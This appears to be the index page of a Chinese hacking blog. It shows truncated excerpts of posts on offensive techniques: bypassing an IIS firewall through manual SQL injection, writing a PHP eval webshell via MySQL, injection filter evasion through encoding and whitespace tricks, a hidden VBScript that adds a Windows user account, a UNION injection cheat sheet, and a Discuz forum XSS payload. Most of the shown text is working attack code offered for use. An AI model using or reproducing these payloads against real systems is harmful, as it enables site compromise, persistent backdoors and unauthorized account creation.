小马博客

一个无聊的人,一个无聊的博客

今天的技术主要是结合网上的和自己的想法思路绕过”龙盾IIS防火墙“其他防火墙没试过 好的废话不多说实战开始, 手工注入,工具是不行啦, 第一咱先判断是否有注入点 http://***.com/newsShow.asp?ArticleID=120 ’ http://***.com/newsS...

发布 0 条评论

php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>...

发布 0 条评论

1、运用编码技术绕过 如URLEncode编码,ASCII编码绕过。 例如or 1=1即 %6f%72%20%31%3d%31 而Test也可以为 CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116) 2、通过空格绕过 如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 ...

发布 0 条评论

dim wsh,FA,FSO set fso=CreateObject("Scripting.FileSystemObject") Set FA= FSO.GetFile(WScript.scriptFullName) FA.Attributes =34 set wsh=CreateObject("WScript.Shell") wsh.run "net user asd 123 /add",0,true wsh.run "net...

发布 0 条评论

暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用...

发布 0 条评论

原型:     [email][url][img]http://hkxm.tk onmouseover=alert(/DZ-xss-0day/); [/img][/url][/email] 发贴时勾选源码, 鸡肋在于,要鼠标触碰才能触发,但是,鼠标触碰还是概率很大很大的把上面的alert(/DZ-X...

发布 0 条评论